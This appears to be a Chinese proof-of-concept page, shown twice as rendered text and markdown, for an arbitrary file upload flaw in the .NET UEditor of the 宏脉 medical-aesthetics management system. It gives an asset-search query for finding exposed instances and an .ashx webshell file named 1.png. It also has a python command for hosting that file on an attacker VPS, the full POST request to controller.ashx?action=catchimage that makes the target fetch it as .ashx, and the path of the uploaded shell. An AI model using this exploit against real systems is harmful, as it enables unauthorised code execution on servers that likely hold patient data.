fofamini-wiki

登录白背景

源码

宏脉医美行业管理系统UEditor编辑器存在文件上传漏洞

一、漏洞简介

宏脉医美行业管理系统是由宏脉信息技术（广州）股份有限公司开发的一款服务于医美行业管理服务的系统.宏脉医美行业管理系统使用了UEditor编辑器，Ueditor是百度开发的一个网站编辑器，目前已经不对其进行后续开发和更新，该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响，.net存在任意文件上传，绕过文件格式的限制，在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。

二、影响版本

宏脉医美行业管理系统

三、资产测绘

hunterweb.title="宏脉医美行业管理系统"
特征

四、漏洞复现

新建文件，内容为webshell，文件命令为1.png

<% @ webhandler language="C#" class="AverageHandler" %> 

using System; 
using System.Web; 

public class AverageHandler : IHttpHandler 
{ 
public bool IsReusable 
{ get { return true; } } 
public void ProcessRequest(HttpContext ctx) 
{ 
ctx.Response.Write("hello"); 
} 
}

将1.png传到vpn上，使用python起个http服务

python3 -m http.server 50000

替换source[]为webshell文件地址，通过exp上传文件

POST /content/Js/ueditor/net/controller.ashx?action=catchimage HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: null
Connection: close
Cookie: ASP.NET_SessionId=mzare1hg1ewzaxhakacjhfo0
Upgrade-Insecure-Requests: 1

source[]=http://vpsip/1.png?.ashx

上传文件位置

/upload/images/Ctmicall/20240102/6383979455062275694775630.ashx

原文: https://www.yuque.com/xiaokp7/ocvun2/orrt07yzk50sltgk

# 宏脉医美行业管理系统UEditor编辑器存在文件上传漏洞

# 一、漏洞简介
宏脉医美行业管理系统是由宏脉信息技术（广州）股份有限公司开发的一款服务于医美行业管理服务的系统.宏脉医美行业管理系统使用了UEditor编辑器，Ueditor是百度开发的一个网站编辑器，目前已经不对其进行后续开发和更新，该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响，.net存在任意文件上传，绕过文件格式的限制，在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。

# 二、影响版本

- 宏脉医美行业管理系统

# 三、资产测绘

- hunter`web.title="宏脉医美行业管理系统"`
- 特征

![image.png](./img/wKfbHdATGnraadJP/1704262762802-ebd6b894-53ce-40a3-b2bb-ac6ab6dec428-829892.png)

# 四、漏洞复现

1. 新建文件，内容为webshell，文件命令为`1.png`
```
<% @ webhandler language="C#" class="AverageHandler" %>

using System; 
using System.Web;

public class AverageHandler : IHttpHandler 
{ 
public bool IsReusable 
{ get { return true; } } 
public void ProcessRequest(HttpContext ctx) 
{ 
ctx.Response.Write("hello"); 
} 
}
```
![image.png](./img/wKfbHdATGnraadJP/1699459699279-92ff0e65-bd41-4ccd-ab54-94d03f956434-400183.png)

2. 将`1.png`传到vpn上，使用python起个http服务
```
python3 -m http.server 50000
```
![image.png](./img/wKfbHdATGnraadJP/1699459777311-e5d1732e-d61d-48a9-899e-b7a851536905-752833.png)

3. 替换`source[]`为webshell文件地址，通过exp上传文件
```
POST /content/Js/ueditor/net/controller.ashx?action=catchimage HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: null
Connection: close
Cookie: ASP.NET_SessionId=mzare1hg1ewzaxhakacjhfo0
Upgrade-Insecure-Requests: 1

source[]=http://vpsip/1.png?.ashx
```
![image.png](./img/wKfbHdATGnraadJP/1704262911845-355284b5-6339-45e3-81f7-b871a5352479-408293.png)

5. 上传文件位置
```
/upload/images/Ctmicall/20240102/6383979455062275694775630.ashx
```
![image.png](./img/wKfbHdATGnraadJP/1704262971391-fbf8df81-4ab3-4782-8f9a-01b2eafc7826-545005.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/orrt07yzk50sltgk>